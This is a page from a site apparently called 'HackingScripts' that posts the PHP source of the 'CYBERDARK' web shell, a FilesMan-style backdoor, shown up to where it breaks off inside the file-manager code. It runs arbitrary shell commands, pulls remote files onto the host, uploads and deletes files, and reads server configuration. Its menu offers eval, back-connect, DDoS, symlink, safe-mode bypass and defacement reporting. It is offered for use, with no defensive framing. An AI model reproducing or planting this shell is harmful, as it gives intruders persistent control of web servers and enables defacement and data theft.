HackingScripts

Hack Scripts for everybody

CYBERDARK Shell

11 Feb 2014

..Another FilesMan shell script?

CYBERDARK Shell Source Code

   1 <?php
   2 
   3 /**
   4  * @author CYBERDARK
   5  * @copyright 2012
   6  */
   7 @define('VERSION','1.0');
   8 @error_reporting(E_ALL ^ E_NOTICE);
   9 @session_start();
  10 @ini_set('error_log',NULL);
  11 @ini_set('log_errors',0);
  12 @ini_set('max_execution_time',0);
  13 @set_time_limit(0);
  14 @set_magic_quotes_runtime(0);
  15 
  16 if(get_magic_quotes_gpc()) {
  17    function madstripslashes($array) {
  18        return is_array($array) ? array_map('madstripslashes', $array) : stripslashes($array);
  19    }
  20    $_POST = madstripslashes($_POST);
  21 }
  22 $default_action = 'FilesMan';
  23 $default_use_ajax = true;
  24 $default_charset = 'Windows-1251';
  25 if (strtolower(substr(PHP_OS,0,3))=="win")
  26     $sys='win';
  27  else
  28     $sys='unix';
  29     
  30 $home_cwd = @getcwd();
  31 if(isset($_POST['c']))
  32    @chdir($_POST['c']);   
  33     
  34 $cwd = @getcwd();
  35 if($sys == 'win') 
  36 {
  37     $home_cwd = str_replace("\\", "/", $home_cwd);
  38    $cwd = str_replace("\\", "/", $cwd);
  39 }
  40 
  41 if($cwd[strlen($cwd)-1] != '/' )
  42    $cwd .= '/';
  43     
  44     
  45 function madEx($in) {
  46    $out = '';
  47    if (function_exists('exec')) {
  48        @exec($in,$out);
  49        $out = @join("\n",$out);
  50    } elseif (function_exists('passthru')) {
  51        ob_start();
  52        @passthru($in);
  53        $out = ob_get_clean();
  54    } elseif (function_exists('system')) {
  55        ob_start();
  56        @system($in);
  57        $out = ob_get_clean();
  58    } elseif (function_exists('shell_exec')) {
  59        $out = shell_exec($in);
  60    } elseif (is_resource($f = @popen($in,"r"))) {
  61        $out = "";
  62        while(!@feof($f))
  63            $out .= fread($f,1024);
  64        pclose($f);
  65    }
  66    return $out;
  67 }
  68 $down=@getcwd();
  69 if($sys=="win")
  70 $down.='\\';
  71 else
  72 $down.='/';
  73 if(isset($_POST['rtdown']))
  74 {
  75 $url = $_POST['rtdown'];
  76 $newfname = $down. basename($url);
  77 $file = fopen ($url, "rb");
  78 if ($file) {
  79   $newf = fopen ($newfname, "wb");
  80   if ($newf)
  81   while(!feof($file)) {
  82     fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
  83   }
  84   }
  85 
  86 if ($file) {
  87   fclose($file);
  88 }
  89 if ($newf) {
  90   fclose($newf);
  91 }
  92 }
  93 
  94     
  95  
  96  function madhead()
  97  {
  98     if(empty($_POST['charset']))
  99        $_POST['charset'] = $GLOBALS['default_charset'];
 100  
 101 $freeSpace = @diskfreespace($GLOBALS['cwd']);
 102 $totalSpace = @disk_total_space($GLOBALS['cwd']);
 103 $totalSpace = $totalSpace?$totalSpace:1;        
 104     
 105 $on="<font color=#0F0> ON </font>";
 106 $of="<font color=red> OFF </font>";
 107 $none="<font color=#0F0> NONE </font>";   
 108 if(function_exists('curl_version'))
 109     $curl=$on;
 110 else
 111     $curl=$of;
 112 if(function_exists('mysql_get_client_info'))
 113     $mysql=$on;
 114  else
 115     $mysql=$of;      
 116 if(function_exists('mssql_connect'))
 117     $mssql=$on;
 118 else
 119    $mssql=$of; 
 120        
 121 if(function_exists('pg_connect'))
 122     $pg=$on;
 123 else
 124    $pg=$of;          
 125 if(function_exists('oci_connect'))
 126    $or=$on;
 127 else
 128    $or=$of;
 129 if(@ini_get('disable_functions'))
 130   $disfun=@ini_get('disable_functions');
 131 else
 132 $disfun="All Functions Enable";
 133 if(@ini_get('safe_mode'))
 134 $safe_modes="<font color=red>ON</font>";
 135 else
 136 $safe_modes="<font color=#0F0 >OFF</font>";
 137 if(@ini_get('open_basedir'))
 138 $open_b=@ini_get('open_basedir');
 139     else
 140   $open_b=$none;
 141     
 142 
 143 if(@ini_get('safe_mode_exec_dir'))
 144 $safe_exe=@ini_get('safe_mode_exec_dir');
 145     else
 146 $safe_exe=$none;
 147 if(@ini_get('safe_mode_include_dir'))
 148    $safe_include=@ini_get('safe_mode_include_dir'); 
 149 else
 150  $safe_include=$none;
 151 if(!function_exists('posix_getegid')) 
 152 {
 153        $user = @get_current_user();
 154        $uid = @getmyuid();
 155        $gid = @getmygid();
 156        $group = "?";
 157 } else 
 158 {
 159        $uid = @posix_getpwuid(posix_geteuid());
 160        $gid = @posix_getgrgid(posix_getegid());
 161        $user = $uid['name'];
 162        $uid = $uid['uid'];
 163        $group = $gid['name'];
 164        $gid = $gid['gid'];
 165    }
 166 
 167 
 168      $cwd_links = '';
 169    $path = explode("/", $GLOBALS['cwd']);
 170    $n=count($path);
 171    for($i=0; $i<$n-1; $i++) {
 172        $cwd_links .= "<a  href='#' onclick='g(\"FilesMan\",\"";
 173        for($j=0; $j<=$i; $j++)
 174            $cwd_links .= $path[$j].'/';
 175        $cwd_links .= "\")'>".$path[$i]."/</a>";
 176    }
 177 
 178 $drives = "";
 179 foreach(range('c','z') as $drive)
 180 if(is_dir($drive.':\\'))
 181 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
 182 
 183 
 184 
 185 
 186 
 187  echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 188 <html xmlns="http://www.w3.org/1999/xhtml">
 189 <head>
 190 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 191 <link href="http://www.madspot.net/favicon.ico" rel="icon" type="image/x-icon"/>
 192 <title>Madspot Security Team Shell</title>
 193 <style type="text/css">
 194 <!--
 195 .whole {
 196   background-color: #CCC;
 197   height:auto;
 198   width: auto;
 199   margin-top: 10px;
 200   margin-right: 10px;
 201   margin-left: 10px;
 202 }
 203 .header {
 204   height: auto;
 205   width: auto;
 206   border: 7px solid #CCC;
 207   color: #999;
 208   font-size: 12px;
 209   font-family: Verdana, Geneva, sans-serif;
 210   background-color: #000;
 211 }
 212 .header a {color:#0F0; text-decoration:none;}
 213 span {
 214   font-weight: bolder;
 215   color: #FFF;
 216 }
 217 #meunlist {
 218   font-family: Verdana, Geneva, sans-serif;
 219   color: #FFF;
 220   background-color: #000;
 221   width: auto;
 222   border-right-width: 7px;
 223   border-left-width: 7px;
 224   border-top-style: solid;
 225   border-right-style: solid;
 226   border-bottom-style: solid;
 227   border-left-style: solid;
 228   border-top-color: #CCC;
 229   border-right-color: #CCC;
 230   border-bottom-color: #CCC;
 231   border-left-color: #CCC;
 232   height: auto;
 233   font-size: 12px;
 234   font-weight: bold;
 235   border-top-width: 0px;
 236 }
 237   .whole #meunlist ul {
 238   padding-top: 5px;
 239   padding-right: 5px;
 240   padding-bottom: 7px;
 241   padding-left: 2px;
 242   text-align:center;
 243   list-style-type: none;
 244   margin: 0px;
 245 }
 246   .whole #meunlist li {
 247   margin: 0px;
 248   padding: 0px;
 249   display: inline;
 250 }
 251   .whole #meunlist a {
 252     font-family: arial, sans-serif;
 253   font-size: 14px;
 254   text-decoration:none;
 255   font-weight: bold;
 256   color: #fff;
 257   clear: both;
 258   width: 100px;
 259   margin-right: -6px;
 260   padding-top: 3px;
 261   padding-right: 15px;
 262   padding-bottom: 3px;
 263   padding-left: 15px;
 264   border-right-width: 1px;
 265   border-right-style: solid;
 266   border-right-color: #FFF;
 267 }
 268   .whole #meunlist a:hover {
 269   color: #000;
 270   background: #fff;
 271 }
 272 
 273 .foot {
 274   font-family: Verdana, Geneva, sans-serif;
 275   background-color: #000;
 276   margin: 0px;
 277   padding: 0px;
 278   width: 100%;
 279   text-align: center;
 280   font-size: 12px;
 281   color: #CCC;
 282   border-right-width: 7px;
 283   border-left-width: 7px;
 284     border-bottom-width: 7px;
 285     border-bottom-style: solid;
 286     border-right-style: solid;
 287     border-right-style: solid;
 288   border-left-style: solid;
 289   border-top-color: #CCC;
 290   border-right-color: #CCC;
 291   border-bottom-color: #CCC;
 292   border-left-color: #CCC;
 293 }';
 294 if(is_writable($GLOBALS['cwd']))
 295  {
 296     echo ".foottable {
 297     width: 300px;
 298     font-weight: bold;
 299     }";}
 300     else
 301     {
 302        echo ".foottable {
 303     width: 300px;
 304     font-weight: bold;
 305     background-color:red;
 306     }
 307     .dir {
 308       background-color:red;  
 309     }
 310     "; 
 311     }    
 312  echo '.main th{text-align:left;}
 313  .main a{color: #FFF;}
 314  .main tr:hover{background-color:red;}
 315  .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
 316  .bigarea{ width:99%; height:300px; }   
 317   </style>
 318 
 319 ';
 320 
 321 echo "<script>
 322     var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
 323     var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
 324     var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
 325     var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
 326     var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
 327     var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
 328     var d = document;
 329   function set(a,c,p1,p2,p3,charset) {
 330       if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
 331       if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
 332       if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
 333       if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
 334       if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
 335       if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
 336   }
 337   function g(a,c,p1,p2,p3,charset) {
 338       set(a,c,p1,p2,p3,charset);
 339       d.mf.submit();
 340   }</script>";
 341 
 342     
 343    echo '
 344 </head>
 345 
 346 <body bgcolor="#000000"  leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
 347 <div class="whole">
 348 <form method=post name=mf style="display:none;">
 349 <input type=hidden name=a>
 350 <input type=hidden name=c>
 351 <input type=hidden name=p1>
 352 <input type=hidden name=p2>
 353 <input type=hidden name=p3>
 354 <input type=hidden name=charset>
 355 </form>
 356   <div class="header"><table width="100%" border="0"  align="lift">
 357   <tr>
 358     <td width="3%"><span>Uname:</span></td>
 359     <td colspan="2">'.substr(@php_uname(), 0, 120).'</td>
 360     </tr>
 361   <tr>
 362     <td><span>User:</span></td>
 363     <td>'. $uid . ' [ ' . $user . ' ] <span>   Group: </span>' . $gid . ' [ ' . $group . ' ] </td>
 364     <td width="14%" rowspan="8"><img alt="" src="data:image/jpeg;base64,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" /></td>
 365   </tr>
 366   <tr>
 367     <td><span>PHP:</span></td>
 368     <td>'.@phpversion(). '   <span>   Safe Mode:'.$safe_modes.'</span></td>
 369     </tr>
 370   <tr>
 371     <td><span>Our IP:</span></td>
 372     <td>'.@$_SERVER["SERVER_ADDR"].'    <span>Server IP:</span> '.@$_SERVER["REMOTE_ADDR"].'</td>
 373   </tr>
 374   <tr>
 375     <td><span>WEBS:</span></td>
 376     <td width="76%">';
 377     
 378     if($GLOBALS['sys']=='unix')
 379     {
 380         $d0mains = @file("/etc/named.conf");
 381         if(!$d0mains)
 382         {
 383             echo "CANT READ named.conf";
 384         }
 385         else
 386         {
 387           $count;  
 388          foreach($d0mains as $d0main)
 389          {
 390           if(@ereg("zone",$d0main))
 391           {
 392           preg_match_all('#zone "(.*)"#', $d0main, $domains);
 393            flush();
 394           if(strlen(trim($domains[1][0])) > 2){
 395          flush();
 396          $count++;
 397            } 
 398            }
 399            }
 400            echo "$count  Domains";
 401         }
 402     }
 403     else{ echo"CANT READ |Windows|";}
 404     
 405       echo '</td>
 406     </tr>
 407     <tr>
 408     <td height="16"><span>HDD:</span></td>
 409     <td>'.madSize($totalSpace).' <span>Free:</span>' . madSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</td>
 410     </tr>';
 411   
 412      if($GLOBALS['sys']=='unix' )
 413 {
 414     if(!@ini_get('safe_mode'))
 415     {
 416     
 417     echo '<tr><td height="18" colspan="2"><span>Useful : </span>';
 418     $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
 419      foreach($userful as $item)
 420          if(madWhich($item))
 421          echo $item.',';
 422          echo '</td>
 423          </tr>
 424           <tr>
 425           <td height="0" colspan="2"><span>Downloader:</span>';
 426          
 427      $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
 428       foreach($downloaders as $item2)
 429        if(madWhich($item2))
 430         echo $item2.',';
 431         echo '</td>
 432               </tr>';
 433          
 434           }
 435            else 
 436            {
 437          echo '<tr><td height="18" colspan="2"><span>useful:</span>'; 
 438          echo '--------------</td>
 439            </tr><td height="0" colspan="2"><span>Downloader: </span>-------------</td>
 440               </tr>';  
 441          }
 442 }
 443 else
 444 {
 445    echo '<tr><td height="18" colspan="2"><span>Window:</span>';
 446    echo madEx('ver');
 447    echo '</td>
 448          </tr> <tr>
 449         <td height="0" colspan="2"><span>Downloader: </span>-------------</td>
 450               </tr>'; 
 451     
 452 }  
 453     
 454  
 455  echo '<tr>
 456     <td height="16" colspan="2"><span>Disabled functions:</span>'.$disfun.'</td>
 457   </tr>
 458   <tr>
 459     <td height="16" colspan="2"><span>cURL:'.$curl.'  MySQL:'.$mysql.'  MSSQL:'.$mssql.'  PostgreSQL:'.$pg.'  Oracle: </span>'.$or.'</td><td width="15%">'.base64_decode("PGEgaHJlZj0iaHR0cDovL3d3dy5tYWRzcG90Lm5ldCIgdGFyZ2V0PSJfYmxhbmsiPjxzcGFuPjxmb250IGNvbG9yPSIjMEYwIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtNQURTUE9ULk5FVDwvZm9udD48L3NwYW4+PC9hPg==").'</td>
 460   </tr>
 461   <tr>
 462   <td height="11" colspan="3"><span>Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.'   Safe_mode_include_dir:'.$safe_include.'</td>
 463   </tr>
 464   <tr>
 465     <td height="11"><span>Server </span></td>
 466     <td colspan="2">'.@getenv('SERVER_SOFTWARE').'</td>
 467   </tr>';
 468   if($GLOBALS[sys]=="win")
 469   {
 470     echo '<tr>
 471     <td height="12"><span>DRIVE:</span></td>
 472     <td colspan="2">'.$drives.'</td>
 473      </tr>';
 474   }
 475   
 476   echo '<tr>
 477     <td height="12"><span>PWD:</span></td>
 478     <td colspan="2">'.$cwd_links.'  <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><font color=red >|CURRENT|</font></a></td>
 479   </tr>
 480   </table>
 481 </div>
 482  <div id="meunlist">
 483       <ul>
 484 <li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">HOME</a></li>
 485 
 486 <li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')">PROCESS</a></li>
 487 <li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')">EVAL</a></li>
 488 <li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')">SQL</a></li>
 489 <li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')">HASH</a></li>
 490 <li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')">CONNECT</a></li>
 491 <li><a href="#" onclick="g(\'zoneh\',null,\'\',\'\',\'\')">ZONE-H</a></li>
 492 <li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')">DDOS</a></li>
 493 <li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
 494 <li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')">SYMLINK</a></li>
 495 <li><a href="#" onclick="g(\'spot\',null,\'\',\'\',\'\')">MADSPOT</a></li>
 496 <li><a href="#" onclick="g(\'selfrm\',null,\'\',\'\',\'\')">KIll C0de</a></li>
 497 </ul>
 498     
 499     </div>
 500 ';   
 501     
 502 }
 503 
 504 function madfooter()
 505 {
 506     
 507     echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
 508        <tr>
 509          <td width='17%'><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>__MK FILE__</span><br><input class='dir'  type=text name=f value=''><input type=submit value='>>'></form></td>
 510          <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>__MK DIR__</span><br><input class='dir' type=text name=d value=''><input type=submit value='>>'></form></td>
 511          <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);return false;\"><span>__DELETE__</span><br><input class='dir' type=text name=del value=''><input type=submit value='>>'></form></td>
 512          <td width='19%'><form onsubmit=\"g('FilesTools',null,this.f.value,'chmod');return false;\"><span>__CHMOD__</span><br><input class='dir' type=text name=f value=''><input type=submit value='>>'></form></td>
 513        </tr>
 514        <tr>
 515          <td colspan='2'><form onsubmit='g(null,this.c.value,\"\");return false;'><span>__CHANGE DIR__</span><br><input class='foottable' type=text name=c value='".htmlspecialchars($GLOBALS['cwd'])."'><input type=submit value='>>'></form></td>
 516          <td colspan='2'><form method='post' ><span>__HTTP DOWNLOAD__</span><br><input class='foottable' type=text name=rtdown value=''><input type=submit value='>>'></form></td>
 517         </tr>
 518        <tr>
 519          <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);return false;\"><span>__EXECUTE__</span><br><input class='foottable' type=text name=c value=''><input type=submit value='>>'></form></td>
 520         </tr>
 521        <tr>
 522          <td colspan='4'><form method='post' ENCTYPE='multipart/form-data'>
 523       <input type=hidden name=a value='FilesMAn'>
 524       <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
 525       <input type=hidden name=p1 value='uploadFile'>
 526       <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
 527         <span>Upload file:</span><br><input class='toolsInp' type=file name=f><br /><input type=submit value='>>'></form></td>
 528         </tr> 
 529       </table>
 530   </div>
 531   </body>
 532 </html>
 533 ";
 534     
 535 }
 536 if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
 537    function posix_getpwuid($p) {return false;} }
 538 if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
 539   function posix_getgrgid($p) {return false;} }
 540 
 541 function madWhich($p) {
 542    $path = madEx('which ' . $p);
 543    if(!empty($path))
 544        return $path;
 545    return false;
 546 }
 547 
 548 
 549 
 550 function madSize($s) {
 551    if($s >= 1073741824)
 552        return sprintf('%1.2f', $s / 1073741824 ). ' GB';
 553    elseif($s >= 1048576)
 554        return sprintf('%1.2f', $s / 1048576 ) . ' MB';
 555    elseif($s >= 1024)
 556        return sprintf('%1.2f', $s / 1024 ) . ' KB';
 557    else
 558        return $s . ' B';
 559 }
 560 
 561 
 562 function madPerms($p) {
 563    if (($p & 0xC000) == 0xC000)$i = 's';
 564    elseif (($p & 0xA000) == 0xA000)$i = 'l';
 565    elseif (($p & 0x8000) == 0x8000)$i = '-';
 566    elseif (($p & 0x6000) == 0x6000)$i = 'b';
 567    elseif (($p & 0x4000) == 0x4000)$i = 'd';
 568    elseif (($p & 0x2000) == 0x2000)$i = 'c';
 569    elseif (($p & 0x1000) == 0x1000)$i = 'p';
 570    else $i = 'u';
 571    $i .= (($p & 0x0100) ? 'r' : '-');
 572    $i .= (($p & 0x0080) ? 'w' : '-');
 573    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
 574    $i .= (($p & 0x0020) ? 'r' : '-');
 575    $i .= (($p & 0x0010) ? 'w' : '-');
 576    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
 577    $i .= (($p & 0x0004) ? 'r' : '-');
 578    $i .= (($p & 0x0002) ? 'w' : '-');
 579    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
 580    return $i;
 581 }
 582 function madPermsColor($f) {
 583    if (!@is_readable($f))
 584        return '<font color=#FF0000>' . madPerms(@fileperms($f)) . '</font>';
 585    elseif (!@is_writable($f))
 586        return '<font color=white>' . madPerms(@fileperms($f)) . '</font>';
 587    else
 588        return '<font color=#25ff00>' . madPerms(@fileperms($f)) . '</font>';
 589 }
 590 
 591 if(!function_exists("scandir")) {
 592    function scandir($dir) {
 593        $dh  = opendir($dir);
 594        while (false !== ($filename = readdir($dh)))
 595            $files[] = $filename;
 596        return $files;
 597    }
 598 }
 599 
 600 
 601 function madFilesMan() {
 602    madhead();
 603     echo '<div class=header><script>p1_=p2_=p3_="";</script>';
 604    if(!empty($_POST['p1'])) {
 605        switch($_POST['p1']) {
 606            case 'uploadFile':
 607                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
 608                    echo "Can't upload file!";
 609                break;
 610            case 'mkdir':
 611                if(!@mkdir($_POST['p2']))
 612                    echo "Can't create new dir";
 613                break;
 614            case 'delete':
 615                function deleteDir($path) {
 616                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
 617                    $dh  = opendir($path);
 618                    while ( ($item = readdir($dh) ) !== false) {
 619                        $item = $path.$item;
 620                        if ( (basename($item) == "..") || (basename($item) == ".") )
 621                            continue;
 622                        $type = filetype($item);
 623                        if ($type == "dir")
 624                            deleteDir($item);
